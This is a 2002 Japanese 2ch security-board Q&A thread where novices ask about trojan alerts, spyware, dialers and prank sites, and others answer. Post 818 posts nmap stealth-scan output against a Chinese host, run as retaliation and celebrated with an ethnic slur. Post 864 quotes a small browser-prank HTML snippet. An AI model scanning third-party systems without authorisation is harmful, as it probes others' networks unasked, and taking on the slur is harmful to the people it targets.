745 :738:02/01/13 01:28
>>742さん ども です!

>フシアナさんやらなくて
やってないです。

>不適切なので、みんなから煽られている
時にありかと...反省シル

>トロイの木馬
ノートン2001定義等は更新済み。チェックOKです。

>会社や大学のネットワークからのアクセス
自宅というか事務所というか...です。マシンは1台

で、結論、2chでIP抜きは『不可能』ということですね。

746 :名無しさん@お腹いっぱい。:02/01/13 01:31
ソネットの8Mサービスなんですが
友達のアッカからレンタルのNEC製のルータでは、デフォルトでポート80が
閉じてるんですが、家に送られてきた富士通製のルータでは開いてます。
塞ぐことはできないんでしょうか
どうか教えて下さい。宜しくお願いします。

747 :738:02/01/13 01:32
>>744さん
ないっす。しかし かなりのバトルは やっとり ますです。
単独犯なのか複数なのかも不明です。

んーわからん....(一人ごと)

748 :738:02/01/13 01:42
飛躍しすぎかも...電磁波盗聴ってことは?やるとしたら金額は?
ちなみに賃貸マンション3階建て コンクリ造。(考えすぎ...か)

749 :名無しさん@お腹いっぱい。:02/01/13 01:44
>>747
下がってるスレでマターリ話してる時に脈絡もなく煽られることある?
なかったら多分問題ないよ

750 :738:02/01/13 01:47
>>749
うーん...ども です。

751 :738:02/01/13 01:59
『電磁波盗聴』ってここで質問してもいいですか?
2chでの問題ではなく、今 この場所での問題かも。
マンションなんで 四方囲まれてる状態。その住人という説。

752 :名無しさん@お腹いっぱい。:02/01/13 02:09
>>751
http://pc.2ch.net/test/read.cgi/sec/991047440/166n-

753 :742:02/01/13 02:20
>745
744や749の言うように、
「たまたま煽りのいそうなスレで話しをしていて、複数人に煽られているのを、同一犯と思っている」
だけのように思いますが。
ウィルスチェックしても、例えば「スパイウェア」のような物は見つからないし、
「VNC」のような遠隔操作ソフトも検出されないです。
そういった物も、チェックしてみて下さい
スパイウェアはhttp://member.nifty.ne.jp/Js_KENJI/pc/ad-aware/ad-aware.htm参照
あと、IE のバージョンによっては、クッキーなどを盗めるので、セキュリティパッチを当てて置いて下さい
一応念のため。

「電磁波盗聴」の可能性は、高くないと思います。
あなたが大企業の幹部などのように「他人にとって盗聴する価値のある人物」でないなら。
またあなたが「VIP」だったとしても、盗聴の結果を「あおり」に使うのは不自然です。
もっとカネになる使い方をするでしょうから。

754 :738:02/01/13 02:20
>>752
調べてみる。サンクスです!

755 :738:02/01/13 02:24
>>753
ども!

セキュ板の勇者達へ 「ありがとーーーーーっ!!!」

756 :名無しさん@お腹いっぱい。:02/01/13 03:18
SYN が来ない
なんか寂しい

757 :738:02/01/13 03:33
セキュ板の勇者へ

ども です。
AD-Awarewでの検索結果でしたが、パッと見 以下でスパイウェアはありますか

Gator file:C:\WINDOWS\GatorPlugin.log
Timesink file:C:\WINDOWS\TSAd.dll
Timesink file:C:\WINDOWS\VcpDLL.dll
DSSAgent file:C:\WINDOWS\SYSTEM\DssAgent.exe
Doubleclick file:C:\WINDOWS\Cookies\2001@doubleclick[2].txt
Gator file:C:\WINDOWS\Downloaded Program Files\IEGator.dll
Gator file:C:\WINDOWS\Downloaded Program Files\IEGator.inf
Gator file:C:\WINDOWS\GatorPlugin.log
Timesink file:C:\WINDOWS\TSAd.dll
Timesink file:C:\WINDOWS\VcpDLL.dll

fault\software\cydoor\
Timesink key:HKEY_USERS\.default\software\timesink, inc.\
Gator key:HKEY_CLASSES_ROOT\clsid\{21ffb6c0-0da1-11d5-a9d5-00500413153c}\
Cydoor key:HKEY_CURRENT_USER\software\cydoor\
Cydoor key:HKEY_LOCAL_MACHINE\software\cydoor\
Gator key:HKEY_LOCAL_MACHINE\software\gator.com\
Gator key:HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\moduleusage\c:/windows/downloaded program files/iegator.dll\
Timesink key:HKEY_CURRENT_USER\software\timesink, inc.\
Timesink key:HKEY_LOCAL_MACHINE\software\timesink, inc.\
Web3000 key:HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\stashedgef
Web3000 key:HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\stashedgmg
DSSAgent key:Software\Microsoft\Windows\CurrentVersion\SharedDLLs\C:\WINDOWS\SYSTEM\DssAgent.exe
Gator key:Software\Microsoft\Windows\CurrentVersion\SharedDLLs\C:\WINDOWS\Downloaded Program Files\IEGator.dll

758 :名無しさん@お腹いっぱい。:02/01/13 03:59
>>757
パッと見、全部でしょう

759 :名無しさん@お腹いっぱい。:02/01/13 04:04
あ.そッスカ(w...これでスッパリ消し去ります。あんがと!!>>758

760 : :02/01/13 04:58
スパイブロッカー入れたらサーバー動作しようとするし、
スパイブロッカーへの外部からアクセスがあるんだけど、、、

761 :名無しさん@お腹いっぱい。:02/01/13 17:42
http://www.symantec.co.jp/region/jp/campaign/wstop/images/gal-back.jpg
誰この女?

762 :名無しさん@お腹いっぱい。:02/01/13 17:44
>>761
調べたんだが、どこにも掲載してねぇんだよ。

763 :736:02/01/14 00:20
またトロイ君が来たよって
ノートン先生に言われた
IPは61.77.51.113
同じとこから4回目みたい
ここってどこなの?
こわいよー

764 :名無しさん@お腹いっぱい。:02/01/14 00:29
>>763
ブロックしてるんだろうから騒ぐような問題じゃない。
ってようなことをいわれませんでしたか?

それでもこわいというなら回線切ってください。
これで確実に来なくなります。

765 :名無しさん@お腹いっぱい。:02/01/14 00:38
>763
http://www.apnic.net/apnic-bin/whois.pl?search=61.77.51.113

766 :736:02/01/14 00:58
すんませんでした
初心者で気になってしかたなかったもので

767 :名無しさん@お腹いっぱい。:02/01/14 06:06
掲示板の話題といえば質問と議論だけど
この板は質問の話題ばっかりで
議論の話題は全然無いね

数ヶ月前(最強の〜等が盛えていた頃)は
それなりに そういう話題を見かけたのに

768 :名無しさん@お腹いっぱい。:02/01/14 06:27
>>767
そもそも板の参加者自体かなり減ってるような…。
だからゲスト質問者ばっかり…。
バドトランスとニムダと…、リンク踏んだ〜これウイルス?と…。
あとはストーカー困ってます系? 他はネタスレ…。

「最近多い質問の答えはココを読め」というスレ1個で
事足りるかもだ。

769 :名無しさん@お腹いっぱい。:02/01/14 23:08
こんなメール来たんですけど、なんなんでしょう・・・

Konnichiwa,Hello,
I liked your penpal message!
My name is Daniel.Watashino namae wa Daniel desu.
I like watching movies,music,traveling. 29 years old.
I live and teach English just near Shibuya st.
Before I worked in Osaka for 1 year, but I like Tokyo much more,
it is more exciting and the accent is not so strong-just a joke...
You can see my photos from the gallery in my homepage:
http://2win.it/danielschool
Please tell me about yourself.
Looking forward meeting you!
Bye.

770 :名無しさん@お腹いっぱい。:02/01/14 23:19
>>769
DMの一種だろ、英会話習いませんか?って。

771 :第三者中継可能?:02/01/14 23:23
From:VistaPrint< vistaprint@optin-global.net >
To: mailop@optin-global.net
Subject:Get 250 full-color business cards for free
Date:***
Received:from[209.114.218.164] by optin-global.net with ESMTP id vistaprint@optin-global.net
From mailop@optin-global.net
X-Sender: optin-global.net
Errors-To: report@optin-global.net
Complain-To: abuse@optin-global.com

You received this email because you signed up at one of Optin Global's websites or you signed up with a party that has contracted with Optin Global. To unsubscribe from our email newsletter, please visit

http://opt-out.optin-global.net/?e=vistaprint@optin-global.net
http://opt-out.optin-global.net/?e=mailop@optin-global.net
http://opt-out.optin-global.net/?e=report@optin-global.net
http://opt-out.optin-global.net/?e=abuse@optin-global.com

772 :769:02/01/14 23:37
>>770
ホントだ(w
怖くてクリック出来なかったから確かめてなかったです
ありがとうございました。

773 :名無しさん@お腹いっぱい。:02/01/14 23:37
>>771
それ、よく貼りつけてあるけど、質問してるのか、
暗にSMTP鯖を紹介しとるんか判断に困るし、正直いらつくヨ。
晒すのが目的なら、すまんがスレたててやってくれんか?

774 :>773:02/01/14 23:39
スレ立てたらすぐ消えた。

775 :773:02/01/14 23:52
>>774 ワロタ
ショウガナイナ…モ〜
ンジャ出来ればsageでお願いね。。

776 : :02/01/15 01:35


777 :名無しさん@お腹いっぱい。:02/01/15 01:53
ここって ハッキングされてない?
http://www.sola.co.jp/

778 :::02/01/15 02:10
聞きたいのですが、勝手に国際回線に繋いでしまうことはあるのでしょうか?
いろいろHPを見ていたら勝手にインストールしたような気がしたので、ダイヤルのプロパティを見たら正しいアクセスポイントの電話番号でした。
しかし頭に81が付いてました。
これって国際回線に繋がっているのでしょうか?
また国際回線に勝手に繋がっているかどうか確認するときどうしたらいいのでしょうか?

779 :::02/01/15 02:14
age

780 : :02/01/15 02:15
>>778
>勝手に国際回線に繋いでしまうことはあるのでしょうか?
あるよ。NTTのHPに警告ソフトあるよ。
81は日本の国際電話識別番号だから気にしなくていい。

781 :::02/01/15 02:19
>>780
ありがとうございます。
もし国際電話に繋がっていた場合、ダイヤルのプロパティに何らかの変化はあるのでしょうか?
例えばアクセスポイントの電話番号が書き換えられるとか。
それとも勝手に国際電話に繋がっている場合、ダイヤルのプロパティでは確認不可能ですか?

782 : :02/01/15 02:27
>>781
番号は変わるよ。自分で戻すとイイよ。
ってか回線一回切断されて国際電話に繋がるからすぐ分かると思う。
確認して番号変わってたら もう遅いジャン
警告ソフト入れたほうが安心だよ。

783 :::02/01/15 02:34
アドバイス有難うございました。
早速警告ソフトをダウンロードしました。どうも私の早とちりだったみたいです。

784 :NTでもJavaで電話番号書換(制限ユーザー):02/01/15 02:43
あるそうです。 雑誌にあった。マイクロソフトがパッチをリリース
しなければ、記事にするとか。台湾などアジアのエロサイトによく
あるそうだ。

785 :名無しさん@お腹いっぱい。:02/01/15 22:43
なぜか最近ネタスレ多いね

786 : :02/01/16 02:30
 

787 :名無しさん@お腹いっぱい。:02/01/16 02:43
さっきインターネットコップネットってとこに繋がってしまいました。
evidence eliminatorってなんですか?

788 :名無しさん@お腹いっぱい。:02/01/16 02:51
いきなりYOU HAVE A BIG PROBLEM なんて書かれて
どうしようか迷ってます。

789 :名無しさん@お腹いっぱい。:02/01/16 03:07
ノートン先生を入れた後FTPソフト使うとSokets de Trois v1で攻撃?との警告が延々と・・・
念のために全スキャンしたけど特に検出もされず(ウィルス定義は最新)。

一旦接続も切って再試行してもやはり同様みたいです。

これって何かされてるんでしょうか?(今まで気が付かなかっただけで)
それとも放置しておいても良いものなのでしょうか?

790 : :02/01/16 03:25
>789
ftpソフトに反応してるだけ。
ftpソフトの規則を作成しては?

791 :名無しさん@お腹いっぱい。:02/01/16 05:27
>>790さん
ありがとうございました。
何とかなりました。

けどこれって何なんですかね?

792 : :02/01/17 18:33
 

793 :名無しさん@お腹いっぱい。:02/01/17 18:33
>>789
私もなりました。ちなみにソフトはFFFTPでしたが、ほかっといたら直りました。

794 : :02/01/18 22:42
 

795 : :02/01/19 00:12
http://choco.2ch.net/test/read.cgi/news/1011361670/-100


これ、ネットセキュリティ板的にはどう?


796 :名無しさん@お腹いっぱい。:02/01/19 00:12
Fuckingって何ですか?

797 :名無しさん@お腹いっぱい。:02/01/19 00:16
>>796
チンポを草むらに出し入れする事です

798 :名無しさん@お腹いっぱい。:02/01/19 00:23
>>796 ありがとうございます。今度、試してみます。
パソコンて、操作が難しいですね!

799 :_:02/01/19 12:55
今現在のノートン先生の統計で、
デフォルトインバウンドNetBios Name の遮断が24回、
デフォルトアウトバウンドNetBios Name の許可が24回。
NetBiosってヤヴァイって聞いたけど、これは大丈夫なのでしょうか?

800 :名無しさん@お腹いっぱい。:02/01/19 15:00
http://pc.2ch.net/test/read.cgi/sec/1011201463/l50

↑はなんで、下がる一方なのですか?
教えてください。

801 :名無しさん@お腹いっぱい。:02/01/19 15:58
書き込みがないからでしょう。

802 :こんた:02/01/20 04:05
すいません。HPがハッキングされてしまったんですが、
どうすればいいのでしょうか?
トップページがわけのわからないコーヒー屋の宣伝ページに
なってます。FTPで再アップしようとしてもホストに
つなげません。どなたかマジヘルプしてください。


803 :こんた:02/01/20 04:21
ちなみに表示されるHPのソースは
http://www.undergroundcoffee.com/
ですなぜこれが私のHPに出てくるのでしょうか?


804 : :02/01/20 10:32
>>802-803
ftpもできないような状態だとしたら、サーバー管理者
(プロバイダとか)に連絡した方がいいんじゃないの?

805 :名無しさん@お腹いっぱい。:02/01/20 12:15
C:\Program Files\xerox\nwwiaというフォルダができているんですけど
誰かコレ何か知ってますか?
フォルダの中は空なのに消そうとすると使用中と言われます。
googleで検索かけたらロシアのページがヒットしました。

806 : :02/01/20 16:01
>>805
まあ、やってみてうまくいったから書くんだけどね、
そゆときは、xeroxのサイトにいってみるわけ。
悪くすると、英語サイトでないとひっかからないかもしれんけど、
まずは日本語サイトであればラッキーね。
http://www.fujixerox.co.jp/
さいわいにもトップページに「検索」てのがあるんで、
http://www.fujixerox.co.jp/common/search/
ここで、nwwiaてのを入れてやる。
結果は当たりでかなりラッキー。
多分この先のリンクを見れば詳しい説明とか対応とかわかるはず。
http://search.fujixerox.co.jp/search97cgi/search.cgi



807 :名無しさん@お腹いっぱい。:02/01/20 16:15
リアルプレイヤーを使ってるとメアドを抜かれるという話を
聞いたんですが本当ですか?
7では改善されてるのかな。

808 :名無しさん@お腹いっぱい。:02/01/20 19:45
>>807
されてない。個人情報抜きの目的で製作されたリアルプレイヤーなんて使う事自体問題。

809 :名無しさん@お腹いっぱい。:02/01/20 20:24
>>807
メアドなんて適当に書くべし xxx@xxx.com でいい
あとはファイアウォールでもいれてリアルプレーヤーが外向きに出す怪しいパケットをブロックしる


810 :名無しさん@お腹いっぱい。:02/01/21 13:54
>806さん
ありがとう

811 :名無しさん@お腹いっぱい。:02/01/21 20:23
また最近 駄スレが増えたな・・・。

周囲のスレをサルベージしようかな

812 : :02/01/22 15:53
    

813 :ど素人:02/01/22 17:44
ポートをふさぐ というのはどうやってやるの?
netstat -aやったらたくさん開いてるみたいなんだけど、
セキュリティソフトを入れないとむりなのかな?

814 :名無しさん@お腹いっぱい。:02/01/22 21:26
1月16日開通予定だったのが本日開通。
遅れた原因はNTTの工事遅れと工事ミス。

なんと、驚いたことに工事ミスで、自宅の電話はまったくの他人に家につながってしまっていた。
113に苦情をいって、修理してもらったら、ADSLもめでたく開通してた。

815 ::02/01/23 08:33
名前がばれていた!よく行くチャットで名前がばれていた!!恐ろしい。。。何でですか??

816 : :02/01/23 09:06
>>815
なんか至る所でこれ見るんだけど、騒いでいるの一人か?

817 :名無しさん@お腹いっぱい。:02/01/24 00:31
普通に「チャットで本名がばれる可能性があるんですか?」とか訊きゃいいのに

818 :名無しさん@お腹いっぱい。:02/01/26 23:14
チャンコロが挨拶してきたので挨拶返しときました。煮るなり焼くなりお好きにどーぞ。

Starting nmap V. 2.54BETA30 ( www.insecure.org/nmap/ )
Host (218.7.145.145) appears to be up ... good.
Initiating SYN Stealth Scan against (218.7.145.145)
Adding open port 21/tcp
Adding open port 1025/tcp
Adding open port 445/tcp
Adding open port 1026/tcp
Adding open port 25/tcp
Adding open port 135/tcp
Adding open port 139/tcp
Adding open port 80/tcp
Adding open port 443/tcp
The SYN Stealth Scan took 62 seconds to scan 1549 ports.
For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled
Interesting ports on (218.7.145.145):
(The 1540 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open loc-srv
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open listen
1026/tcp open nterm

Remote operating system guess: MS Windows2000 Professional RC1/W2K Advance Server Beta3
TCP Sequence Prediction: Class=random positive increments
Difficulty=310993 (Good luck!)
IPID Sequence Generation: Busy server or unknown class

Nmap run completed -- 1 IP address (1 host up) scanned in 68 seconds


819 :名無しさん@お腹いっぱい。:02/01/27 00:00
>>818
まさか、、、80アクセスされてそんだけぶん廻したわけぢゃ。。。

820 :名無しさん@お腹いっぱい。:02/01/27 00:12
そだよ。 チャンコロだし。


821 :名無しさん@お腹いっぱい。:02/01/27 00:26
>>820
(・∀・)イイ!
漏れのところ、日によって80アクセスの頻度違うんだよな。。。
今日は静かだ。。

822 :名無しさん@お腹いっぱい。:02/01/27 13:54
80アクセスしたやつがチャンコロかどうか調べる方法を教えてください。

823 :名無しさん@お腹いっぱい。:02/01/27 18:14
>>822
whois.arin.net 北米
whois.apnic.net アジア太平洋
whois.ripe.net ヨーロッパ
に聞く。


824 :名無しさん@お腹いっぱい。:02/01/28 17:29
interMute Pro 1.0のスレッドってまだ出来てないみたいだね。ユーザーが
まだいないんだろうか。

825 :名無しさん@お腹いっぱい。:02/01/28 18:54
不正アクセスした奴をそのサーバー管理者に通知するにはどうすればいいんでしょうか?

826 :名無しさん@お腹いっぱい。:02/01/28 18:55
>>825
ログを添えてメールじゃないの?

827 :名無しさん@お腹いっぱい。:02/01/28 18:57
メールするには、IPドメインサーチで調べて出てくるメアド
に送ればいいんでしょうか?

828 :墓守:02/01/28 19:13
>>822
http://cgi.apnic.net/apnic-bin/ipv4-by-country.pl?country=kr
http://irms.nic.or.kr/servlet/member.view.ISPIpAddress

829 :巡回広報:02/01/28 23:42
Mypartyていう新ウィルスに気をつけてね

☆ウィルス情報&質問 総合スレッド☆
http://pc.2ch.net/test/read.cgi/sec/1010948022/l50

830 :名無しさん@お腹いっぱい。:02/02/04 23:39
ところで皆さんは
噂のこのサイトを見ました?
http://www.yaromat.com/macos8/index.htm
なんかすごいことになってますよね??

これって踏んだらどうなるの??


831 :名無しさん@お腹いっぱい。:02/02/05 00:14
>>830 それね、君が生まれる前からあるのよ。
HEAD /macos8/index.htm HTTP/1.0
Host: www.yaromat.com

HTTP/1.1 200 OK
Date: Mon, 04 Feb 2002 15:10:05 GMT
Server: Apache
Last-Modified: Tue, 17 Apr 2001 19:19:28 GMT
ETag: "2b09dc-13e-3adc9740"
Accept-Ranges: bytes
Content-Length: 318
Connection: close
Content-Type: text/html


832 :名無しさん@お腹いっぱい。:02/02/05 00:48
質問です
httpsのサイトで書き込んだ情報ってのは管理者にはわかりませんか?
具体的には職場でメールしたいってことなんですけど…
セキュリティ対応ってなっているんですがどうなんでしょうか?

833 :名無しさん@お腹いっぱい。:02/02/05 00:56
>>832 内容はわからないがどこにつないでいたかはわかる。
しかし、SSLはCPU食うので認証時だけSSLで、その後の通信は通常のhttpじゃ無いのか?
見られて困るなら携帯のメール使え。

834 :802:02/02/05 01:00
ありがとうございます。
携帯のメール使ってるとさぼってるのばればれですから(w
その後もSSLだとすると鍵がついていたらOKでしょうか?

835 :名無しさん@お腹いっぱい。:02/02/05 01:00
誰か教えて下さい。
私はヤフーのフリーメールを使ってメールの交換してた人がいるんですけど
その人から「あなたのIPアドレスこれで、使ってるプロバイダはこれだろ」
「今度個人情報ばらしてパソコンも潰してやる」って送られてきたんです。
プロバイダを教えてないのに合っていてびっくりしたんですけど
本当にそんな事ができるんですか?


836 :名無しさん@お腹いっぱい。:02/02/05 01:01
友達が、 ICQで知らない外人から
「君のパソコンは覗かれている、このページを見てご覧なさい」
とアドレス付きのメッセージが来て、そのページを見てみたら
自分のパソコンのフォルダとかが一瞬表示されて
すぐに違うページに飛んだそうなんです。
これってただのたちの悪いいたずらなんですか?
それともウイルスやセキュリティを疑った方がいいのでしょうか?
ファイヤーウォール内にいたそうなんですが…。

837 :名無しさん@お腹いっぱい。:02/02/05 01:17
>>835
メールヘッダ
>「今度個人情報ばらしてパソコンも潰してやる」

>>836
これか?これは不安を煽るための糞サイトだYO
ttp://www.security-check2.ch.vu/

838 :836:02/02/05 01:21
>>837
よかった、大丈夫なんですね。友達に伝えます。
ありがとうございました。

839 :835:02/02/05 01:31
何度もごめんなさい>>837さん
それでは理解できなかったんでもう少し詳しく
教えてくれませんか?

840 :名無しさん@お腹いっぱい。:02/02/05 01:45
>>835
同じことがhotmailとかでも言える。IP漏れるのね。
相手はどこのメール使ってたのよ?
メールヘッダが漏れないフリーメールもあるからそれを使えば?
clubaa.comとかgoo.ne.jpとか。
もし会社からつないでたらちょっとそれはマズイがまぁ、ヤフーID消しておくのもいいかも。
すぐ切れ。

841 :835:02/02/05 01:51
>>840
ありがとうございます。なんとなく理解できました。
自宅から繋いでるのですが、とりあえずヤフーIDを消せばいいのですね?
ちなみにメールしてた人はこんなのを使っていました→@kun.ne.jp

842 :教えてください:02/02/05 01:56
教えてください。
2ちゃんのスロ板を見ていて、スロ情報だと思い、カキコミのあった
ttp://www.geocities.co.jp/SiliconValley-Cupertino/9822/mysoft/files/madoka08.zip
にアクセスをしてしまいました。
ウイルスバスター2002が「ウイルス」と警告を発しまして、
最終的に「隔離成功」となっているのですが、心配です。
ウイルス名はJOKE_MADO.Aとなっています。
JOKEとあるのでジョーク系とは思いつつ……。

今思えば**.zipなのでヘンというか……気がつかず。
すみません、対処法を教えてください。


843 :名無しさん@お腹いっぱい。:02/02/05 02:03
>>842
そのまま。ジョークソフトでつ。

844 :教えてください:02/02/05 02:08
>>843
ということは……なんか、「お気に入り」にへんなサイトが
追加されていたのですが、それだけだったんですかね
(それは削除しました)。あと、その「madoka08.zip」というのが
残っていたのですがそれを削除しまして、それで終了という
感じでいいのでしょうか。
すみません……くだらない質問で^^;申し訳ないです。


845 :名無しさん@お腹いっぱい。:02/02/05 02:12
>>842
ウイルスバスターで駆除できたのならそれでよし

846 :教えてください:02/02/05 02:20
>>845
正確には「ウイルス駆除できません」とログにでてまして、
D:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OWMOTQBN\madoka08[1].zip
にあるのは「隔離できません」と出ているんです。ただ、
D:\DOCUME~1\ADMINI~1\LOCALS~1\TEMPOR~1\Content.IE5\OWMOTQBN\madoka08[1].zip
その下にある上記のファイルは「隔離成功」とありまして……
これは、結果的に「隔離できた」という解釈でいいんでしょうか。

隔離された(上記の)ファイルを削除したのですが、
これでOKでしょうか? すみません、教えてください。

847 :名無しさん@お腹いっぱい。:02/02/05 02:26
>>846
ZIPファイル解凍して中のEXEファイル実行してなきゃ感染してないよ

もし実行したのならウイルスバスターのHPでもいって駆除方法見てくれ

848 :教えてください:02/02/05 02:37
>>847
すみません、ありがとうございます。
EXEファイルは実行していないです。ZIPファイルのままでした。
ただ、DLした直後に勝手に[お気に入り]に
Webサイトの登録をしてしまっていたので、心配になったのです。
ただ、プログラム本体とお気に入りの登録は別物なのかも
しれないと……。

ウイルスバスターのHP行ったのですが、該当するものが
気がつかなくて、それでこちらにきた次第です。
でも、スキル不足で、どこかに該当するものがあるのかもですね。
すみませんですm(_ _)m。

849 :教えてください:02/02/05 02:40
すみません、ありました!
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JOKE_MADO.A
これでした。みなさん、お騒がせいたしました。
ありがとう!!>>all

850 :(;´Д`)なんでこんなマジレスしてるんだろ・・宇津:02/02/05 02:41
>>848
>プログラム本体とお気に入りの登録は別物なのかも
99%そうです。

これ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JOKE_MADO.A

851 :(;´Д`)アァ・・:02/02/05 02:42
・ ・ ・ 。

852 :教えてください:02/02/05 02:58
>>851(850)
ありがとうございます!
とりあえず、>>842でdlしてしまった後にできたお気に入りは
削除して、SYSEDIT.EXE実行後「Run=」の記述がないことも
確認しました。さらに、アンインストーラも見つかりまして、
解決しそうです。
本当にありがとうございます!!

853 :名無しさん@お腹いっぱい。:02/02/06 17:35
質問させて頂きます。

現在エロサイトに繋いで画像を落としまくっています。
またこれが良質な画像が満載なので、もしやQ2じゃないかと危惧しています。
回線はフレッツISDNです。
(ISDNはQ2には繋がらないと聞いたことはあるんですが・・・)

無論、無料サイトと確信しており
その手の接続ソフトも落ちた覚えもありませんし、常に接続先も確認しています。

ただ、これだけ用心しても勝手にQ2に接続されると言うことはあるのでしょうか?
ご教授賜りたくお願いいたします。
その手のソフトも

854 :名無しさん@お腹いっぱい。:02/02/06 17:50
>またこれが良質な画像が満載なので、
サービス精神旺盛なんじゃないの(w

ISDN回線でも内蔵モデムがTAの電話用のモジュラージャックに
つながっていれば通常電話回線を経由してつながる。
対策ソフトとかあるけど、
面倒ならNTT行ってQ2と国際電話を止めてもらっちゃいな。確実。

855 :名無しさん@お腹いっぱい。:02/02/06 17:52
Q2接続ソフトをバイナリエディタで開いてURLを抜き出す。これ。

856 :名無しさん@お腹いっぱい。:02/02/06 17:52
ttp://www.top.or.jp/~godhand/a2.html

助けてください これの解析をお願いします
変なのがインストールされます


857 :名無しさん@お腹いっぱい。:02/02/06 17:53
>>856
されない 無害

858 :名無しさん@お腹いっぱい。:02/02/06 17:54
>>857
ただのイタズラってことでしょうか?

859 :名無しさん@お腹いっぱい。:02/02/06 17:56
>>858
そうDESU

860 :名無しさん@お腹いっぱい。:02/02/06 17:58
>>859
ありがとうございました これからはもうむやみにクリックしないように気をつけます

861 :名無しさん@お腹いっぱい。:02/02/06 17:58
やばいです。http://bbbaaa.netfirms.com/の罠っての開いたらハードディスクがガタガタ言い始めました。
一体何なのでしょう?

862 :名無しさん@お腹いっぱい。:02/02/06 18:01
>>861

  罠に注意!!

  絶対にクリックすんな!!

  There are many traps.So,Don't click!

863 :名無しさん@お腹いっぱい。:02/02/06 18:02
そうです。でも押してしまいました。どうなるのでしょう?

864 :名無しさん@お腹いっぱい。:02/02/06 18:05
>>864
ハードディスクじゃなくてフロッピードライブがガタガタいったんじゃないか?

<img src="file:///A|/a.gif"><img src="file:///A|/b.gif"><img src="file:///A|/c.gif"><img src="file:///A|/d.gif">
<script>w=window.open('???XXX.htm');</script>

いずれにせよ 無害

865 :名無しさん@お腹いっぱい。:02/02/06 18:07
よかった〜、無害ですか。ありがとうございました。
パソコン厨房なので、怖かったです。

866 :名無しさん@お腹いっぱい。:02/02/07 13:53
コードの対戦――MicrosoftがP2Pゲームを用意
http://www.zdnet.co.jp/news/0202/07/e_terrarium.html

サンドボックスに穴が開いてたらどうしよう?


867 :名無しさん@お腹いっぱい。:02/02/07 15:47
113 IDENT Closed なんすけど
なんのポート?

868 :名無しさん@お腹いっぱい。 :02/02/07 16:16
今、MXで交換中にNIS2001がセキュリティー警告を発して
リモートコンピュータが リモートアクセスの
トロイの木馬(Back Orific)によってこのコンピュータの
通常使うポートに対する接続を試行しました。試行は遮断されました。
って出たんですけど大丈夫ですか?

マジビビってるんですけど・・・

869 :名無しさん@お腹いっぱい。:02/02/07 17:08
>>867
認証用のポートらしい(よく分からん)
メール送信時などに使われる。Closedなら問題ないでしょう。

>>868
ブロックしたんならそれで良いよ。
(MXで使用中の)空いてるポートに来たら怖いけど。

870 :名無しさん@お腹いっぱい。:02/02/07 17:09
>>868
MXとそれが関係あるかどうかはリモートアドレス調べれば分かる。

871 :名無しさん@お腹いっぱい。:02/02/07 17:23
最近チャットしてたら、ブラクラを貼られるんだけど
ウィンドウがいっぱいとか、変なサイトにいって固まるとか
防ぐ方法ってわかりますか?板違いかな。

872 :名無しさん@お腹いっぱい。:02/02/07 18:02
そこへチャットに行かないってのが正解なんだけど。
チャットの際にIEを使っているんなら、設定により
変なプログラムを実行されることを防ぐことはできるかも。
IEバージョンとかにより異なるが、ツール→インターネットオプション
の詳細設定あたりか、セキュリティで制限付きにしちまうか。
ただ、それでチャットに入れなくなるとかがあるかもしれんなあ。

873 :名無しさん@お腹いっぱい。:02/02/07 18:25
ウイルスじゃないかもしれないですが相談させてください。

ブラウザがちょっとおかしなことになっています。
ブラウザの最小化のところに「0」、
ブラウザの最大化のところに「1」、
という数字が出たり、
ウマーAAの口が太い縦棒になったりしています。
前もこういうことになり、2ヵ月ほどで元に戻ったのですが心配です。
どうかこれを直す方法を教えていただけないでしょうか。

874 :名無しさん@お腹いっぱい。:02/02/07 18:48
>>873
http://winfaq.jp/
トップページ見れ

こういうのはWindows板へ逝け(ってもう遅いか)

875 :名無しさん@お腹いっぱい。:02/02/07 18:53
そろそろ名無しをfusianasanにしないか? 厨房多くて困るよ

876 :名無しさん@お腹いっぱい。:02/02/07 19:13
それは通技の特権だからだめだろ

877 :名無しさん@お腹いっぱい。:02/02/07 19:38
公務員が国の機関で運用しているシステムへのアクセス記録を
外に漏らすことは法律で許されているのでしょうか。


878 :名無しさん@お腹いっぱい。:02/02/07 19:45
リモートホストの件で質問いいですか?

あるBBSで、名前を変えて3人の人が書き込んでくるんだけど
ネズミ講関連のカキコなので
リモートホストを調べたんです。

そしたら
********.@@@.mesh.ad.jp

って3人ともなっていました。(***の数字は異なってます)

meshなんて聞いたことないプロバだったんで

ttp://www.mesh.ad.jp  で飛んでみようとしたけど
何もでてこなかったんで
adをneに変えたら、BIGLOBEのHPに飛びました。

直接聞いたら
mesh.ne.jpは確かにうちだけどad.jpは知らないって言われました。

そもそも、ad自体初めてしったんです。
個人ならneとかor ですよね?またはacとか。

長くなりましたけど
adってどんなのか知ってる方いましたら宜しくお願いいたします。


879 :名無しさん@お腹いっぱい。:02/02/07 20:13
2ch、あちこち鯖がとびまくり…

880 :名無しさん@お腹いっぱい。:02/02/07 20:17
んだんだ。

881 :873:02/02/07 20:20
>>874
ありがとうございます!直りました。
検索不足だったようで…すいません。
お手数おかけしました。

882 :名無しさん@お腹いっぱい。:02/02/07 21:54
>>878
ttp://www.nic.ad.jp/

883 :名無しさん@お腹いっぱい。:02/02/07 22:05
なーなー、パスワードとかいれたら「*****」みたくなるでしょ?
その「*****」のパスワードってなんだったか忘れてよー、
それを知る事ができる伊藤家裏技ないですか?

884 :名無しさん@お腹いっぱい。:02/02/07 22:36
>>883
そういうソフトあるよ。Vectorとかで探せばいい

885 :名無しさん@お腹いっぱい。:02/02/07 22:41
ノートンのネットネキュリティー2001を入れたのですが、
とたんにメールが受信できなくなってしまいました。
どうすれば良いか教えてください。

886 :cheshire-cat:02/02/07 22:54
>>885
受信メールサーバーは、「pop3.norton.antivirus」になってる?
ファイアーウォールの方で、メーラーを弾いているとかじゃないよね。

887 :名無しさん@お腹いっぱい。:02/02/07 23:28
>>886
POPはpop3.norton.antivirusになっていないです。
セキュリティのチェックをはずすと、
受信できるのですが、それじゃ意味が無いし・・・。


